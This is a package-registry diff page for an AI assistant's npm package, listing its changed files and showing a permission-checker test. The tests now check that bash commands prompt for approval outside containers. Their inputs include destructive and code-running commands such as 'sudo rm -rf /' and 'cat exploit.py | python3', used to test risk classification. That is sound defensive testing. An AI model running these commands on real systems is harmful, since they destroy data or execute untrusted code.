npm - @vellumai/assistant - Versions diffs - 0.6.0 → 0.6.2 - Mend

@vellumai/assistant 0.6.0 → 0.6.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (358) hide show

package/AGENTS.md +4 -0
package/ARCHITECTURE.md +68 -15
package/Dockerfile +2 -2
package/bun.lock +6 -2
package/docker-entrypoint.sh +42 -1
package/docs/architecture/integrations.md +1 -1
package/docs/architecture/memory.md +21 -24
package/node_modules/@vellumai/ces-contracts/src/handles.ts +7 -9
package/openapi.yaml +539 -4
package/package.json +5 -1
package/src/__tests__/anthropic-provider.test.ts +160 -95
package/src/__tests__/app-dir-path-guard.test.ts +1 -0
package/src/__tests__/app-executors.test.ts +47 -1
package/src/__tests__/app-source-watcher.test.ts +159 -0
package/src/__tests__/assistant-event-hub.test.ts +30 -0
package/src/__tests__/checker.test.ts +138 -172
package/src/__tests__/cli-command-risk-guard.test.ts +1 -1
package/src/__tests__/config-schema.test.ts +5 -0
package/src/__tests__/context-overflow-approval.test.ts +5 -5
package/src/__tests__/conversation-agent-loop-overflow.test.ts +4 -6
package/src/__tests__/conversation-agent-loop.test.ts +4 -51
package/src/__tests__/conversation-analysis-routes.test.ts +169 -0
package/src/__tests__/conversation-directories-parse.test.ts +105 -0
package/src/__tests__/conversation-history-web-search.test.ts +1 -1
package/src/__tests__/conversation-runtime-assembly.test.ts +653 -832
package/src/__tests__/conversation-runtime-workspace.test.ts +1 -93
package/src/__tests__/conversation-tool-setup-app-refresh.test.ts +17 -4
package/src/__tests__/conversation-wipe.test.ts +2 -6
package/src/__tests__/conversation-workspace-cache-state.test.ts +6 -12
package/src/__tests__/conversation-workspace-injection.test.ts +25 -26
package/src/__tests__/conversation-workspace-tool-tracking.test.ts +1 -1
package/src/__tests__/copy-composer-tc-templates.test.ts +335 -0
package/src/__tests__/credential-execution-approval-bridge.test.ts +0 -2
package/src/__tests__/date-context.test.ts +76 -210
package/src/__tests__/db-schedule-syntax-migration.test.ts +16 -1
package/src/__tests__/file-list-tool.test.ts +219 -0
package/src/__tests__/first-greeting.test.ts +1 -1
package/src/__tests__/heartbeat-service.test.ts +180 -3
package/src/__tests__/identity-routes.test.ts +328 -0
package/src/__tests__/init-feature-flag-overrides.test.ts +167 -0
package/src/__tests__/injection-block.test.ts +24 -0
package/src/__tests__/inline-command-runner.test.ts +7 -5
package/src/__tests__/install-skill-routing.test.ts +7 -6
package/src/__tests__/jobs-store-qdrant-breaker.test.ts +15 -14
package/src/__tests__/list-messages-tool-merge.test.ts +300 -0
package/src/__tests__/llm-context-normalization.test.ts +18 -18
package/src/__tests__/llm-context-route-provider.test.ts +101 -0
package/src/__tests__/llm-request-log-turn-query.test.ts +162 -0
package/src/__tests__/log-export-workspace.test.ts +257 -100
package/src/__tests__/managed-credential-catalog-cli.test.ts +12 -14
package/src/__tests__/mcp-abort-signal.test.ts +5 -0
package/src/__tests__/mcp-client-auth.test.ts +5 -0
package/src/__tests__/memory-recall-log-store.test.ts +132 -0
package/src/__tests__/migration-export-streaming.test.ts +304 -0
package/src/__tests__/migration-import-commit-http.test.ts +11 -10
package/src/__tests__/mock-fetch.ts +87 -0
package/src/__tests__/navigate-settings-tab.test.ts +14 -1
package/src/__tests__/notification-broadcaster.test.ts +65 -0
package/src/__tests__/notification-decision-recipient-context.test.ts +282 -0
package/src/__tests__/onboarding-template-contract.test.ts +63 -14
package/src/__tests__/parser.test.ts +32 -0
package/src/__tests__/permission-checker-host-gate.test.ts +452 -0
package/src/__tests__/permission-controls-v2-flag.test.ts +55 -0
package/src/__tests__/permission-mode-sse.test.ts +418 -0
package/src/__tests__/permission-mode-store.test.ts +277 -0
package/src/__tests__/permission-mode.test.ts +101 -0
package/src/__tests__/pkb-autoinject.test.ts +96 -0
package/src/__tests__/platform-bash-auto-approve.test.ts +359 -0
package/src/__tests__/profiler-routes.test.ts +502 -0
package/src/__tests__/profiler-run-store.test.ts +441 -0
package/src/__tests__/proxy-approval-callback.test.ts +4 -75
package/src/__tests__/registry.test.ts +1 -1
package/src/__tests__/require-fresh-approval.test.ts +0 -2
package/src/__tests__/sandbox-diagnostics.test.ts +1 -32
package/src/__tests__/sandbox-host-parity.test.ts +5 -4
package/src/__tests__/scheduler-reuse-conversation.test.ts +368 -0
package/src/__tests__/scrub-corrupted-image-attachments.test.ts +278 -0
package/src/__tests__/search-skills-unified.test.ts +4 -3
package/src/__tests__/send-endpoint-busy.test.ts +42 -3
package/src/__tests__/set-permission-mode.test.ts +274 -0
package/src/__tests__/skill-load-feature-flag.test.ts +12 -0
package/src/__tests__/skill-memory.test.ts +2 -783
package/src/__tests__/strip-memory-injections.test.ts +187 -0
package/src/__tests__/subagent-detail.test.ts +84 -0
package/src/__tests__/subagent-disposal.test.ts +308 -0
package/src/__tests__/subagent-manager-notify.test.ts +19 -10
package/src/__tests__/subagent-notify-parent.test.ts +390 -0
package/src/__tests__/subagent-role-registry.test.ts +108 -0
package/src/__tests__/subagent-tool-filtering.test.ts +71 -0
package/src/__tests__/subagent-tools.test.ts +464 -4
package/src/__tests__/system-prompt-ask-mode.test.ts +139 -0
package/src/__tests__/task-memory-cleanup.test.ts +12 -12
package/src/__tests__/terminal-sandbox.test.ts +1 -1
package/src/__tests__/terminal-tools.test.ts +16 -29
package/src/__tests__/test-preload.ts +18 -0
package/src/__tests__/tool-domain-event-publisher.test.ts +0 -1
package/src/__tests__/tool-executor-lifecycle-events.test.ts +1 -8
package/src/__tests__/tool-executor.test.ts +4 -27
package/src/__tests__/tool-side-effects-slack-dm.test.ts +1 -0
package/src/__tests__/top-level-renderer.test.ts +10 -13
package/src/__tests__/transport-hints-queue.test.ts +77 -0
package/src/__tests__/trust-store.test.ts +4 -4
package/src/__tests__/trusted-contact-lifecycle-notifications.test.ts +116 -2
package/src/__tests__/workspace-migration-028-recover-conversations-from-disk-view.test.ts +387 -0
package/src/__tests__/workspace-migration-030-seed-pkb-autoinject.test.ts +168 -0
package/src/__tests__/workspace-policy.test.ts +2 -7
package/src/agent/loop.ts +6 -29
package/src/approvals/guardian-request-resolvers.ts +24 -0
package/src/avatar/traits-png-sync.ts +3 -3
package/src/channels/types.ts +5 -0
package/src/cli/__tests__/run-assistant-command.ts +56 -0
package/src/cli/__tests__/unknown-command.test.ts +33 -0
package/src/cli/commands/__tests__/email-download.test.ts +245 -0
package/src/cli/commands/__tests__/email-list.test.ts +192 -0
package/src/cli/commands/__tests__/email-register.test.ts +186 -0
package/src/cli/commands/__tests__/email-send.test.ts +291 -0
package/src/cli/commands/__tests__/email-status.test.ts +181 -0
package/src/cli/commands/__tests__/email-unregister.test.ts +139 -0
package/src/cli/commands/__tests__/routes.test.ts +562 -0
package/src/cli/commands/conversations.ts +1 -8
package/src/cli/commands/default-action.ts +68 -1
package/src/cli/commands/email.ts +584 -835
package/src/cli/commands/memory.ts +1 -34
package/src/cli/commands/notifications.ts +7 -2
package/src/cli/commands/oauth/__tests__/connect.test.ts +27 -0
package/src/cli/commands/oauth/connect.ts +25 -5
package/src/cli/commands/platform/__tests__/connect.test.ts +1 -1
package/src/cli/commands/platform/__tests__/disconnect.test.ts +1 -1
package/src/cli/commands/platform/__tests__/status.test.ts +1 -1
package/src/cli/commands/routes.ts +396 -0
package/src/cli/commands/skills.ts +130 -20
package/src/cli/program.ts +11 -2
package/src/cli.ts +1 -120
package/src/config/assistant-feature-flags.ts +59 -55
package/src/config/bundled-skills/app-builder/SKILL.md +91 -5
package/src/config/bundled-skills/gmail/SKILL.md +13 -8
package/src/config/bundled-skills/gmail/TOOLS.json +1 -1
package/src/config/bundled-skills/gmail/tools/gmail-sender-digest.ts +2 -1
package/src/config/bundled-skills/messaging/SKILL.md +7 -0
package/src/config/bundled-skills/schedule/SKILL.md +22 -2
package/src/config/bundled-skills/schedule/TOOLS.json +8 -0
package/src/config/bundled-skills/settings/TOOLS.json +1 -1
package/src/config/bundled-skills/settings/tools/avatar-get.ts +3 -13
package/src/config/bundled-skills/settings/tools/avatar-remove.ts +2 -4
package/src/config/bundled-skills/settings/tools/avatar-update.ts +5 -2
package/src/config/bundled-skills/settings/tools/navigate-settings-tab.ts +8 -3
package/src/config/bundled-skills/slack/SKILL.md +2 -0
package/src/config/bundled-skills/subagent/SKILL.md +43 -3
package/src/config/bundled-skills/subagent/TOOLS.json +29 -4
package/src/config/env-registry.ts +63 -0
package/src/config/feature-flag-registry.json +17 -1
package/src/config/schema.ts +8 -0
package/src/config/schemas/filing.ts +51 -0
package/src/config/schemas/heartbeat.ts +15 -12
package/src/config/schemas/memory-lifecycle.ts +12 -0
package/src/config/schemas/security.ts +14 -0
package/src/config/schemas/services.ts +8 -0
package/src/credential-execution/approval-bridge.ts +0 -1
package/src/credential-execution/managed-catalog.ts +3 -7
package/src/daemon/app-source-watcher.ts +93 -0
package/src/daemon/config-watcher.ts +85 -3
package/src/daemon/context-overflow-approval.ts +0 -1
package/src/daemon/conversation-agent-loop-handlers.ts +20 -0
package/src/daemon/conversation-agent-loop.ts +179 -65
package/src/daemon/conversation-attachments.ts +0 -1
package/src/daemon/conversation-history.ts +4 -19
package/src/daemon/conversation-lifecycle.ts +8 -14
package/src/daemon/conversation-messaging.ts +3 -0
package/src/daemon/conversation-process.ts +30 -8
package/src/daemon/conversation-queue-manager.ts +8 -0
package/src/daemon/conversation-runtime-assembly.ts +359 -308
package/src/daemon/conversation-surfaces.ts +65 -0
package/src/daemon/conversation-tool-setup.ts +44 -17
package/src/daemon/conversation-workspace.ts +1 -2
package/src/daemon/conversation.ts +19 -3
package/src/daemon/date-context.ts +26 -53
package/src/daemon/first-greeting.ts +1 -1
package/src/daemon/handlers/conversations.ts +5 -7
package/src/daemon/handlers/shared.test.ts +143 -0
package/src/daemon/handlers/shared.ts +70 -5
package/src/daemon/handlers/skills.ts +11 -18
package/src/daemon/lifecycle.ts +220 -158
package/src/daemon/message-types/conversations.ts +29 -6
package/src/daemon/message-types/messages.ts +9 -2
package/src/daemon/message-types/notifications.ts +12 -0
package/src/daemon/message-types/schedules.ts +1 -0
package/src/daemon/message-types/settings.ts +18 -0
package/src/daemon/profiler-run-store.ts +557 -0
package/src/daemon/server.ts +87 -10
package/src/daemon/shutdown-handlers.ts +5 -0
package/src/daemon/tool-side-effects.ts +23 -3
package/src/daemon/transport-hints.ts +33 -0
package/src/export/transcript-formatter.ts +148 -0
package/src/filing/filing-service.ts +228 -0
package/src/heartbeat/heartbeat-service.ts +96 -7
package/src/index.ts +1 -1
package/src/mcp/client.ts +6 -0
package/src/mcp/mcp-oauth-provider.ts +149 -27
package/src/memory/admin.ts +33 -32
package/src/memory/app-store.ts +69 -0
package/src/memory/conversation-bootstrap.ts +1 -1
package/src/memory/conversation-crud.ts +151 -117
package/src/memory/conversation-directories.ts +39 -0
package/src/memory/conversation-group-migration.ts +66 -6
package/src/memory/conversation-queries.ts +58 -12
package/src/memory/conversation-title-service.ts +1 -0
package/src/memory/db-init.ts +182 -376
package/src/memory/embedding-local.ts +1 -1
package/src/memory/graph/bootstrap.ts +75 -66
package/src/memory/graph/capability-seed.ts +167 -17
package/src/memory/graph/consolidation.ts +38 -4
package/src/memory/graph/conversation-graph-memory.ts +133 -104
package/src/memory/graph/extraction-job.ts +9 -4
package/src/memory/graph/extraction.ts +66 -23
package/src/memory/graph/graph-memory-state-store.ts +37 -0
package/src/memory/graph/graph-search.ts +29 -15
package/src/memory/graph/injection.ts +38 -8
package/src/memory/graph/inspect.ts +12 -3
package/src/memory/graph/retriever.ts +365 -262
package/src/memory/graph/store.test.ts +48 -0
package/src/memory/graph/store.ts +150 -11
package/src/memory/graph/tool-handlers.ts +84 -209
package/src/memory/graph/tools.ts +8 -52
package/src/memory/graph/types.ts +24 -0
package/src/memory/group-crud.ts +25 -9
package/src/memory/job-handlers/cleanup.ts +44 -1
package/src/memory/jobs-store.ts +70 -60
package/src/memory/jobs-worker.ts +44 -28
package/src/memory/llm-request-log-store.ts +96 -12
package/src/memory/memory-recall-log-store.ts +49 -5
package/src/memory/migrations/203-drop-memory-items-tables.ts +33 -1
package/src/memory/migrations/206-memory-graph-node-edits.ts +19 -0
package/src/memory/migrations/206-scrub-corrupted-image-attachments.ts +131 -0
package/src/memory/migrations/207-conversation-graph-memory-state.ts +20 -0
package/src/memory/migrations/208-conversations-last-message-at.ts +35 -0
package/src/memory/migrations/209-strip-thinking-from-consolidated.ts +85 -0
package/src/memory/migrations/210-schedule-reuse-conversation.ts +13 -0
package/src/memory/migrations/211-memory-recall-logs-query-context.ts +21 -0
package/src/memory/migrations/212-llm-request-logs-created-at-index.ts +19 -0
package/src/memory/migrations/index.ts +8 -0
package/src/memory/migrations/registry.ts +8 -0
package/src/memory/schema/conversations.ts +14 -0
package/src/memory/schema/infrastructure.ts +8 -1
package/src/memory/schema/memory-core.ts +0 -51
package/src/memory/schema/memory-graph.ts +15 -0
package/src/memory/task-memory-cleanup.ts +30 -11
package/src/messaging/provider.ts +1 -1
package/src/notifications/broadcaster.ts +6 -0
package/src/notifications/conversation-pairing.ts +12 -4
package/src/notifications/copy-composer.ts +86 -0
package/src/notifications/decision-engine.ts +35 -0
package/src/notifications/emit-signal.ts +14 -0
package/src/notifications/signal.ts +11 -0
package/src/oauth/platform-connection.test.ts +2 -2
package/src/oauth/seed-providers.ts +1 -0
package/src/permissions/checker.ts +15 -4
package/src/permissions/defaults.ts +7 -8
package/src/permissions/permission-mode-store.ts +180 -0
package/src/permissions/permission-mode.ts +31 -0
package/src/permissions/prompter.ts +0 -2
package/src/permissions/workspace-policy.ts +9 -0
package/src/platform/client.ts +1 -1
package/src/prompts/system-prompt.ts +59 -7
package/src/prompts/templates/BOOTSTRAP-REFERENCE.md +100 -0
package/src/prompts/templates/BOOTSTRAP.md +76 -162
package/src/prompts/templates/HEARTBEAT.md +3 -1
package/src/prompts/templates/SOUL.md +30 -9
package/src/prompts/templates/UPDATES.md +8 -0
package/src/providers/anthropic/client.ts +107 -219
package/src/runtime/assistant-event-hub.ts +22 -0
package/src/runtime/auth/route-policy.ts +23 -0
package/src/runtime/auth/token-service.ts +8 -0
package/src/runtime/http-server.ts +32 -2
package/src/runtime/http-types.ts +12 -1
package/src/runtime/migrations/vbundle-builder.ts +389 -3
package/src/runtime/migrations/vbundle-importer.ts +8 -6
package/src/runtime/routes/__tests__/user-route-dispatcher.test.ts +378 -0
package/src/runtime/routes/app-management-routes.ts +1 -11
package/src/runtime/routes/approval-strategies/guardian-callback-strategy.ts +26 -0
package/src/runtime/routes/archive-utils.ts +29 -0
package/src/runtime/routes/avatar-routes.ts +2 -9
package/src/runtime/routes/btw-routes.ts +14 -1
package/src/runtime/routes/conversation-analysis-routes.ts +185 -0
package/src/runtime/routes/conversation-management-routes.ts +1 -14
package/src/runtime/routes/conversation-query-routes.ts +49 -3
package/src/runtime/routes/conversation-routes.ts +270 -44
package/src/runtime/routes/group-routes.ts +22 -8
package/src/runtime/routes/heartbeat-routes.ts +4 -10
package/src/runtime/routes/identity-routes.ts +53 -18
package/src/runtime/routes/llm-context-normalization.ts +14 -10
package/src/runtime/routes/log-export/AGENTS.md +104 -0
package/src/runtime/routes/log-export/__tests__/workspace-allowlist-error-contract.test.ts +103 -0
package/src/runtime/routes/log-export/__tests__/workspace-allowlist.test.ts +716 -0
package/src/runtime/routes/log-export/workspace-allowlist.ts +458 -0
package/src/runtime/routes/log-export-routes.ts +41 -278
package/src/runtime/routes/memory-item-routes.test.ts +168 -233
package/src/runtime/routes/migration-routes.ts +18 -7
package/src/runtime/routes/profiler-routes.ts +350 -0
package/src/runtime/routes/schedule-routes.ts +27 -12
package/src/runtime/routes/settings-routes.ts +95 -8
package/src/runtime/routes/subagents-routes.ts +28 -7
package/src/runtime/routes/user-route-dispatcher.ts +223 -0
package/src/runtime/routes/user-routes.ts +41 -0
package/src/runtime/routes/workspace-routes.ts +0 -1
package/src/schedule/schedule-store.ts +30 -0
package/src/schedule/scheduler.ts +45 -18
package/src/skills/catalog-install.ts +10 -2
package/src/skills/inline-command-runner.ts +12 -14
package/src/skills/managed-store.ts +2 -2
package/src/skills/skill-memory.ts +1 -293
package/src/subagent/index.ts +13 -3
package/src/subagent/manager.ts +308 -29
package/src/subagent/types.ts +68 -0
package/src/tasks/task-runner.ts +4 -4
package/src/tools/apps/executors.ts +29 -4
package/src/tools/filesystem/list.ts +93 -0
package/src/tools/permission-checker.ts +78 -18
package/src/tools/registry.ts +4 -0
package/src/tools/schedule/create.ts +3 -0
package/src/tools/schedule/list.ts +1 -0
package/src/tools/schedule/update.ts +6 -0
package/src/tools/secret-detection-handler.ts +0 -1
package/src/tools/shared/filesystem/errors.ts +5 -0
package/src/tools/shared/filesystem/file-ops-service.ts +90 -2
package/src/tools/shared/filesystem/types.ts +17 -0
package/src/tools/shared/shell-output.ts +31 -2
package/src/tools/skills/sandbox-runner.ts +3 -6
package/src/tools/subagent/abort.ts +12 -2
package/src/tools/subagent/message.ts +9 -2
package/src/tools/subagent/notify-parent.ts +79 -0
package/src/tools/subagent/read.ts +29 -8
package/src/tools/subagent/resolve.ts +21 -0
package/src/tools/subagent/spawn.ts +2 -0
package/src/tools/subagent/status.ts +11 -1
package/src/tools/system/avatar-generator.ts +3 -3
package/src/tools/system/register.ts +23 -0
package/src/tools/system/set-permission-mode.ts +103 -0
package/src/tools/terminal/parser.ts +30 -5
package/src/tools/terminal/safe-env.ts +16 -1
package/src/tools/terminal/sandbox-diagnostics.ts +4 -4
package/src/tools/terminal/sandbox.ts +4 -1
package/src/tools/terminal/shell.ts +3 -5
package/src/tools/tool-manifest.ts +6 -0
package/src/tools/types.ts +2 -3
package/src/util/logger.ts +1 -1
package/src/util/platform.ts +50 -17
package/src/watcher/provider-types.ts +1 -1
package/src/workspace/migrations/023-move-config-files-to-workspace.ts +2 -2
package/src/workspace/migrations/024-move-runtime-files-to-workspace.ts +2 -2
package/src/workspace/migrations/028-recover-conversations-from-disk-view.ts +270 -0
package/src/workspace/migrations/029-seed-pkb.ts +85 -0
package/src/workspace/migrations/030-seed-pkb-autoinject.ts +73 -0
package/src/workspace/migrations/registry.ts +6 -0
package/src/workspace/top-level-renderer.ts +5 -9
package/src/__tests__/cli-memory.test.ts +0 -377
package/src/__tests__/clipboard.test.ts +0 -88
package/src/cli/cli-memory.ts +0 -179
package/src/util/clipboard.ts +0 -34

package/src/__tests__/checker.test.ts CHANGED Viewed

@@ -48,14 +48,12 @@ mock.module("../util/logger.js", () => ({
 interface TestConfig {
   permissions: { mode: "strict" | "workspace" };
   skills: { load: { extraDirs: string[] } };
-  sandbox: { enabled: boolean };
   [key: string]: unknown;
 }
 const testConfig: TestConfig = {
   permissions: { mode: "workspace" },
   skills: { load: { extraDirs: [] } },
-  sandbox: { enabled: true },
 };
 mock.module("../config/loader.js", () => ({
@@ -640,49 +638,23 @@ describe("Permission Checker", () => {
   // ── check (decision logic) ─────────────────────────────────────
   describe("check", () => {
-    test("sandbox bash auto-allows all risk levels via default rule", async () => {
-      // High risk
+    test("bash follows risk-based policy (no default allow rule outside container)", async () => {
+      // High risk → prompt
       const high = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
-      expect(high.decision).toBe("allow");
-      expect(high.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(high.decision).toBe("prompt");
-      // Medium risk
+      // Medium risk → prompt
       const med = await check(
         "bash",
         { command: "curl https://example.com" },
         "/tmp",
       );
-      expect(med.decision).toBe("allow");
-      expect(med.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(med.decision).toBe("prompt");
-      // Low risk
+      // Low risk → auto-allowed via risk-based fallback
       const low = await check("bash", { command: "ls" }, "/tmp");
       expect(low.decision).toBe("allow");
-      expect(low.matchedRule?.id).toBe("default:allow-bash-global");
-    });
-    test("bash prompts when sandbox is disabled (no global allow rule)", async () => {
-      testConfig.sandbox.enabled = false;
-      clearCache();
-      try {
-        const high = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
-        expect(high.decision).toBe("prompt");
-        const med = await check(
-          "bash",
-          { command: "curl https://example.com" },
-          "/tmp",
-        );
-        expect(med.decision).toBe("prompt");
-        // Low risk still auto-allows via the normal risk-based fallback
-        const low = await check("bash", { command: "ls" }, "/tmp");
-        expect(low.decision).toBe("allow");
-        expect(low.reason).toContain("Low risk");
-      } finally {
-        testConfig.sandbox.enabled = true;
-        clearCache();
-      }
+      expect(low.reason).toContain("Low risk");
     });
     test("host_bash high risk → always prompt", async () => {
@@ -2337,11 +2309,11 @@ describe("Permission Checker", () => {
   // ── strict mode: no implicit allow (PR 21) ───────────────────
   describe("strict mode — no implicit allow (PR 21)", () => {
-    test("sandbox bash auto-allows in strict mode (default rule is a matching rule)", async () => {
+    test("bash prompts in strict mode (no default allow rule outside container)", async () => {
       testConfig.permissions.mode = "strict";
       const result = await check("bash", { command: "ls" }, "/tmp");
-      expect(result.decision).toBe("allow");
-      expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(result.decision).toBe("prompt");
+      expect(result.reason).toContain("Strict mode");
     });
     test("host_bash prompts low risk in strict mode (default ask rule matches)", async () => {
@@ -2462,10 +2434,9 @@ describe("Permission Checker", () => {
       expect(result.decision).toBe("prompt");
     });
-    test("sandbox bash auto-allows high-risk via default allowHighRisk rule", async () => {
+    test("bash prompts for high-risk without default allow rule", async () => {
       const result = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
-      expect(result.decision).toBe("allow");
-      expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(result.decision).toBe("prompt");
     });
     test("medium-risk tool with allow rule is NOT affected by allowHighRisk", async () => {
@@ -3657,11 +3628,11 @@ describe("Permission Checker", () => {
     //    explicit matching rule. ──────────────────────────────────────
     describe("Invariant 1: strict mode requires explicit matching rule for every tool", () => {
-      test("sandbox bash auto-allows in strict mode (default rule matches)", async () => {
+      test("bash prompts in strict mode (no default allow rule outside container)", async () => {
         testConfig.permissions.mode = "strict";
         const result = await check("bash", { command: "echo hello" }, "/tmp");
-        expect(result.decision).toBe("allow");
-        expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+        expect(result.decision).toBe("prompt");
+        expect(result.reason).toContain("Strict mode");
       });
       test("low-risk host_bash prompts in strict mode (default ask rule matches)", async () => {
@@ -3709,15 +3680,14 @@ describe("Permission Checker", () => {
         expect(result.reason).toContain("Strict mode");
       });
-      test("high-risk sandbox bash auto-allows in strict mode (default allowHighRisk rule)", async () => {
+      test("high-risk bash prompts in strict mode (no default allow rule outside container)", async () => {
         testConfig.permissions.mode = "strict";
         const result = await check(
           "bash",
           { command: "sudo apt update" },
           "/tmp",
         );
-        expect(result.decision).toBe("allow");
-        expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+        expect(result.decision).toBe("prompt");
       });
       test("high-risk host_bash command with no user rule prompts in strict mode", async () => {
@@ -4130,20 +4100,39 @@ describe("Permission Checker", () => {
     test("getDefaultRuleTemplates tolerates partial config mocks", () => {
       const originalSkills = testConfig.skills;
-      const originalSandbox = testConfig.sandbox;
       try {
         testConfig.skills = {} as any;
-        testConfig.sandbox = {} as any;
         const templates = getDefaultRuleTemplates();
         expect(Array.isArray(templates)).toBe(true);
         expect(templates.some((t) => t.id.includes("extra-"))).toBe(false);
+        // bash allow rule is conditional on IS_CONTAINERIZED, not present in test env
         expect(
           templates.some((t) => t.id === "default:allow-bash-global"),
-        ).toBe(true);
+        ).toBe(false);
       } finally {
         testConfig.skills = originalSkills;
-        testConfig.sandbox = originalSandbox;
+      }
+    });
+    test("getDefaultRuleTemplates includes bash allow rule when IS_CONTAINERIZED", () => {
+      const orig = process.env.IS_CONTAINERIZED;
+      process.env.IS_CONTAINERIZED = "true";
+      try {
+        const templates = getDefaultRuleTemplates();
+        const bashRule = templates.find(
+          (t) => t.id === "default:allow-bash-global",
+        );
+        expect(bashRule).toBeDefined();
+        expect(bashRule!.tool).toBe("bash");
+        expect(bashRule!.pattern).toBe("**");
+        expect(bashRule!.allowHighRisk).toBe(true);
+      } finally {
+        if (orig === undefined) {
+          delete process.env.IS_CONTAINERIZED;
+        } else {
+          process.env.IS_CONTAINERIZED = orig;
+        }
       }
     });
   });
@@ -4400,22 +4389,58 @@ describe("Permission Checker", () => {
   });
 });
-describe("bash network_mode=proxied — no special-casing", () => {
+describe("bash network_mode=proxied — risk capped at medium", () => {
   beforeEach(() => {
     clearCache();
     testConfig.permissions = { mode: "workspace" };
     testConfig.skills = { load: { extraDirs: [] } };
   });
-  test("proxied bash follows normal rules (auto-allowed by default rule)", async () => {
-    // Proxied bash is no longer force-prompted — the default allow-bash rule
-    // auto-allows low/medium risk commands regardless of network_mode.
+  test("proxied bash follows risk-based policy (medium risk → prompt outside container)", async () => {
     const result = await check(
       "bash",
       { command: "curl https://api.example.com", network_mode: "proxied" },
       "/tmp",
     );
-    expect(result.decision).toBe("allow");
+    // Without the containerized bash allow rule, proxied medium-risk bash prompts
+    expect(result.decision).toBe("prompt");
+  });
+  test("proxied bash caps high-risk commands to medium", async () => {
+    // pipe-to-interpreter (stdin exec) is normally High risk, but proxied mode caps at Medium
+    const risk = await classifyRisk("bash", {
+      command: "cat exploit.py | python3",
+      network_mode: "proxied",
+    });
+    expect(risk).toBe(RiskLevel.Medium);
+  });
+  test("pipe to python3 -c is not high risk (inline code, not stdin exec)", async () => {
+    const risk = await classifyRisk("bash", {
+      command:
+        'cat data.json | python3 -c "import sys; print(sys.stdin.read())"',
+    });
+    expect(risk).toBe(RiskLevel.Low);
+  });
+  test("pipe to python3 without -c is high risk (stdin exec)", async () => {
+    const risk = await classifyRisk("bash", {
+      command: "cat exploit.py | python3",
+    });
+    expect(risk).toBe(RiskLevel.High);
+  });
+  test("proxied bash with high-risk command prompts (medium risk cap, no default allow rule)", async () => {
+    const result = await check(
+      "bash",
+      {
+        command: "cat exploit.py | python3",
+        network_mode: "proxied",
+      },
+      "/tmp",
+    );
+    // High risk capped to medium by proxied mode, but still prompts without the bash allow rule
+    expect(result.decision).toBe("prompt");
   });
   test("host_bash with network_mode=proxied follows normal flow", async () => {
@@ -4643,8 +4668,8 @@ describe("scope matching behavior", () => {
       { command: "npm install" },
       "/home/user/other-project",
     );
-    // npm install is Low risk, so it falls through to auto-allow via the
-    // default sandbox bash rule, not via the project-scoped rule.
+    // npm install is Low risk, so it's auto-allowed via the risk-based
+    // fallback, not via the project-scoped rule.
     // The key assertion is that the project-scoped rule is NOT the matched rule.
     if (result.matchedRule) {
       expect(result.matchedRule.scope).not.toBe(projectDir);
@@ -4726,80 +4751,37 @@ describe("workspace mode — auto-allow workspace-scoped operations", () => {
     expect(result.reason).toContain("Low risk");
   });
-  // ── bash (sandbox) — default rule matches, workspace mode not reached ──
+  // ── bash (non-containerized) — workspace auto-allow blocked, risk-based fallback ──
-  test("bash in workspace with sandbox (non-proxied) → allow via default rule", async () => {
+  test("bash in workspace (low risk) → allow via risk-based fallback, not workspace mode", async () => {
     const result = await check("bash", { command: "ls -la" }, workspaceDir);
     expect(result.decision).toBe("allow");
-    // Allowed via the default sandbox bash rule, not workspace mode
-    expect(result.matchedRule?.id).toBe("default:allow-bash-global");
-  });
-  // ── bash sandbox gate — workspace auto-allow depends on sandbox being enabled ──
-  test("bash with sandbox disabled in workspace mode → falls through to risk-based policy (not auto-allowed)", async () => {
-    const origSandbox = testConfig.sandbox.enabled;
-    testConfig.sandbox.enabled = false;
-    try {
-      const result = await check(
-        "bash",
-        { command: "echo hello" },
-        workspaceDir,
-      );
-      // Should NOT be auto-allowed via workspace mode
-      expect(result.reason).not.toContain("Workspace mode");
-      // With sandbox disabled, no default bash allow rule either, so it falls through to risk-based policy
-      expect(result.decision).toBe("allow");
-      expect(result.reason).toContain("Low risk");
-    } finally {
-      testConfig.sandbox.enabled = origSandbox;
-    }
-  });
-  test("bash with sandbox enabled in workspace mode → auto-allowed via default rule", async () => {
-    const origSandbox = testConfig.sandbox.enabled;
-    testConfig.sandbox.enabled = true;
-    try {
-      const result = await check(
-        "bash",
-        { command: "echo hello" },
-        workspaceDir,
-      );
-      expect(result.decision).toBe("allow");
-      // With sandbox enabled, the default bash allow rule matches before workspace mode
-      expect(result.matchedRule?.id).toBe("default:allow-bash-global");
-    } finally {
-      testConfig.sandbox.enabled = origSandbox;
-    }
+    // Not auto-allowed via workspace mode — bash falls through to risk-based policy
+    expect(result.reason).not.toContain("Workspace mode");
+    expect(result.reason).toContain("Low risk");
   });
-  test("bash with sandbox disabled in workspace mode — medium risk command → prompt (not auto-allowed)", async () => {
-    const origSandbox = testConfig.sandbox.enabled;
-    testConfig.sandbox.enabled = false;
-    try {
-      // An unknown program is medium risk; without sandbox, workspace auto-allow is blocked
-      const result = await check(
-        "bash",
-        { command: "some-unknown-program --flag" },
-        workspaceDir,
-      );
-      expect(result.reason).not.toContain("Workspace mode");
-      expect(result.decision).toBe("prompt");
-    } finally {
-      testConfig.sandbox.enabled = origSandbox;
-    }
+  test("bash in workspace (medium risk) → prompt (not auto-allowed)", async () => {
+    // An unknown program is medium risk; without container, workspace auto-allow is blocked
+    const result = await check(
+      "bash",
+      { command: "some-unknown-program --flag" },
+      workspaceDir,
+    );
+    expect(result.reason).not.toContain("Workspace mode");
+    expect(result.decision).toBe("prompt");
   });
-  // ── proxied bash — follows normal rules (no special-casing) ──
+  // ── proxied bash — risk capped at medium ──
-  test("bash with network_mode=proxied → allow (follows normal rules in workspace mode)", async () => {
+  test("bash with network_mode=proxied → prompt (medium risk, not auto-allowed outside container)", async () => {
     const result = await check(
       "bash",
       { command: "curl https://api.example.com", network_mode: "proxied" },
       workspaceDir,
     );
-    // Default allow-bash rule auto-allows; proxied mode is not special-cased.
